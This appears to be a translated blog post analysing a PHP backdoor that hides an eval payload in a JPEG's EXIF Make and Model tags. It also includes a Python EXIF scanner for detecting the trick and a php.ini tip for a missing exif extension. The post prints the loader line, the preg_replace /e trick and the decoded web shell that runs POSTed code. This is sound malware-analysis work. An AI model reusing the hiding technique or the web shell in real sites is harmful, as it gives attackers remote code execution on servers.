PHP Pictures Trojan Explanation

Source: Internet
Author: User

This is a very interesting backdoor. Instead of hiding its payload in the usual way (such as Base64 or gzip encoding), it stores the data inside the EXIF header of a JPEG image. It then uses two PHP functions, exif_read_data and preg_replace, to read the EXIF header and execute its contents.


The backdoor has two parts. The first part is a short PHP snippet: exif_read_data reads the image header and preg_replace executes its content. Here is the code found on the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'');

On their own, the two functions are harmless. exif_read_data is commonly used to read image metadata, and preg_replace performs regular-expression search and replace. However, preg_replace has a hidden and subtle option: if the pattern carries the /e modifier, the replacement string is executed as PHP code through eval() instead of being inserted as text. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this snippet only works on older PHP builds.)

So when we look at the bun.jpg file itself, we find the second part of the backdoor:

ÿøÿà^@^pjfif^@^a^b^@^@d^@d^@^@ÿá^@¡exif^@^@II*^@^h^@^@^@^b^@ ^O^ a^b^@^f^@^@^@&^@^@^@^p^a^b^@m^@^@^@,^@^@^@^@^@^@^ @/. */e^@ eval (base64_decode ( "Awygkgl Zc2v0kcrfue9tvfsie noxil0pksb7zxzhbchzdhjpchnsyxnozxmojf9qt1nuwyj6ejeixskpo30= ')); @ÿì^@^qducky^@^a^@ ^d^@^@^@<^@^@ÿî^@^nadobe^

The file starts with a normal JPEG/JFIF header, but the Make tag contains the strange value "/.*/e". With that execution modifier in the pattern, preg_replace hands whatever replacement string it receives to eval().

Things are starting to get interesting ...

If we continue through the EXIF data, we can see that the "eval(base64_decode(...))" call is hidden in the Model tag. Put the two together and the picture is clear: the attacker reads the Make and Model values from the EXIF header and passes them to preg_replace as the pattern and the replacement. Substituting $exif['Make'] and $exif['Model'] into the call gives the final backdoor:

preg_replace("/.*/e", '@eval(base64_decode("aWYgKGl..."));', '');

Decoding the Base64 string shows that it executes whatever is supplied in $_POST["zz1"]. Fully decoded, here is the backdoor:

if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }

Another interesting point is that bun.jpg and the other modified image files still load and display correctly after the modification. On these compromised sites the attacker altered legitimate images that already existed on the site, which is an unusual way to hide malware.
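A defender-side check for this technique, added here as an example and not part of the original article: a minimal Exif (TIFF IFD0) parser, written from scratch so it needs no image library, pulls the Make and Model tags out of a JPEG and flags values that look like a delimited regex with an e modifier or that contain PHP code. The build_sample_jpeg helper constructs a stub JPEG for testing; it is not a real photo.

```python
import re
import struct

MAKE, MODEL = 0x010F, 0x0110  # TIFF/Exif tag ids for Make and Model

def exif_make_model(jpeg: bytes) -> dict:
    """Pull the ASCII Make/Model tags out of a JPEG's APP1 (Exif) segment, no image library needed."""
    pos = 2  # skip SOI (FF D8)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker, seglen = jpeg[pos + 1], struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xDA:  # start of scan: no more metadata segments follow
            break
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            tiff = seg[6:]
            end = "<" if tiff[:2] == b"II" else ">"  # byte order from the TIFF header
            ifd = struct.unpack(end + "I", tiff[4:8])[0]
            n = struct.unpack(end + "H", tiff[ifd:ifd + 2])[0]
            tags = {}
            for i in range(n):
                tag, typ, cnt, val = struct.unpack(end + "HHI4s", tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i])
                if tag in (MAKE, MODEL) and typ == 2:  # type 2 = ASCII; values > 4 bytes live at an offset
                    data = val[:cnt] if cnt <= 4 else tiff[struct.unpack(end + "I", val)[0]:][:cnt]
                    tags["Make" if tag == MAKE else "Model"] = data.rstrip(b"\x00").decode("latin-1")
            return tags
        pos += 2 + seglen
    return {}

E_MODIFIER = re.compile(r"^([^\w\s])(.*)\1[a-zA-Z]*e[a-zA-Z]*$", re.S)  # delimited regex whose flags include e
CODE_HINT = re.compile(r"\b(eval|base64_decode|assert|system|passthru)\s*\(", re.I)

def suspicious_exif(jpeg: bytes) -> list:
    """Flag Make/Model values that look like a preg_replace /e pattern or embedded PHP code."""
    findings = []
    for field, value in exif_make_model(jpeg).items():
        if E_MODIFIER.match(value):
            findings.append(f"{field}: regex with /e modifier ({value!r})")
        if CODE_HINT.search(value):
            findings.append(f"{field}: PHP code in tag ({value[:40]!r})")
    return findings

def build_sample_jpeg(make: bytes, model: bytes) -> bytes:
    """Constructed test input: a stub JPEG whose IFD0 holds only Make and Model (both longer than 4 bytes)."""
    make, model = make + b"\x00", model + b"\x00"
    ifd = struct.pack("<H", 2)  # 2 entries; string data starts right after the IFD at TIFF offset 38
    ifd += struct.pack("<HHII", MAKE, 2, len(make), 38) + struct.pack("<HHII", MODEL, 2, len(model), 38 + len(make))
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd + struct.pack("<I", 0) + make + model
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

Running suspicious_exif over every image under a web root is enough to surface the Make/Model combination described above; a hit on E_MODIFIER alone is already worth a manual look, since no camera writes a regex into its Make tag.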


Call to undefined function exif_read_data()

A program that reads image EXIF information reports: Call to undefined function exif_read_data()

Solution:

In php.ini, change the load order so that extension=php_exif.dll comes after extension=php_mbstring.dll, because the exif extension depends on mbstring being loaded first.

